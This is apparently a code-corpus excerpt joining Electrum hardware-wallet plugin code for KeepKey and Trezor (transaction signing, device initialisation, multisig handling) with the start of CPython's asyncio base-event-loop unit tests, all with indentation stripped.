outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
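        # Convert Electrum inputs into KeepKey protobuf TxInputType messages.
        # When for_sig is True, BIP32 paths and multisig data are attached so the device can sign.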
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
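            # Default nSequence 0xfffffffe keeps the input non-final so nLockTime is honoured.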
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException,
get_xpubs_and_der_suffixes_from_txinout)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
Capability, BackupType, RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
from trezorlib.client import PASSPHRASE_ON_DEVICE
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
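    # Fallback stand-ins so this module still imports without trezorlib: attribute access
    # returns stable dummy values (e.g. RecoveryDeviceType.ScrambledWords used below).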
class _EnumMissing:
def __init__(self):
self.counter = 0
self.values = {}
def __getattr__(self, key):
if key not in self.values:
self.values[key] = self.counter
self.counter += 1
return self.values[key]
Capability = _EnumMissing()
BackupType = _EnumMissing()
RecoveryDeviceType = _EnumMissing()
PASSPHRASE_ON_DEVICE = object()
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
plugin: 'TrezorPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None:
raise UserFacingException(_('Missing previous tx.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
backup_type: int = BackupType.Bip39
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://pypi.org/project/trezor/'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 12, 0)
maximum_library = (0, 13)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
self._is_bridge_available = None
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def is_bridge_available(self) -> bool:
# Testing whether the Bridge is available can take several seconds
# (when it is not), as it is slow to timeout, hence we cache it.
if self._is_bridge_available is None:
try:
call_bridge("enumerate")
except Exception:
self._is_bridge_available = False
# never again try with Bridge due to slow timeout
BridgeTransport.ENABLED = False
else:
self._is_bridge_available = True
return self._is_bridge_available
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
if self.is_bridge_available():
devices = BridgeTransport.enumerate()
else:
devices = trezorlib.transport.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['TrezorClientBase']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
        msg = _("Choose how you want to initialize your {}.").format(self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RecoveryDeviceType.ScrambledWords:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
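            # 12/18/24 words are BIP39 seed lengths; the 20- and 33-word counts are SLIP39 (Shamir) shares.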
strength_from_word_count = {12: 128, 18: 192, 20: 128, 24: 256, 33: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
backup_type=settings.backup_type,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RecoveryDeviceType.Matrix:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub('m', 'standard', creating=is_creating_wallet))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'TrezorKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_trezor_input_script_type(txin.script_type)
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n = full_path
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'TrezorKeyStore'):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
t.inputs = self.tx_inputs(tx)
t.bin_outputs = [
TxOutputBinType(amount=o.value, script_pubkey=o.scriptpubkey)
for o in tx.outputs()
]
return t
|
test_base_events.py
|
"""Tests for base_events.py"""
import concurrent.futures
import errno
import math
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
from test.support import os_helper
from test.support import socket_helper
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def tearDownModule():
asyncio.set_event_loop_policy(None)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
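# Decorator: run the test with asyncio.base_events.socket replaced by the mock module above.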
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
if socket_helper.IPV6_ENABLED:
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = self.loop.create_future()
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
class DummyExecutor(concurrent.futures.ThreadPoolExecutor):
def submit(self, fn, *args, **kwargs):
raise NotImplementedError(
'cannot submit into a dummy executor')
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
executor = DummyExecutor()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_set_default_executor_error(self):
executor = mock.Mock()
msg = 'executor must be ThreadPoolExecutor instance'
with self.assertRaisesRegex(TypeError, msg):
self.loop.set_default_executor(executor)
self.assertIsNone(self.loop._default_executor)
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = loop.create_future()
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop, None)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop, None)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop, None)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
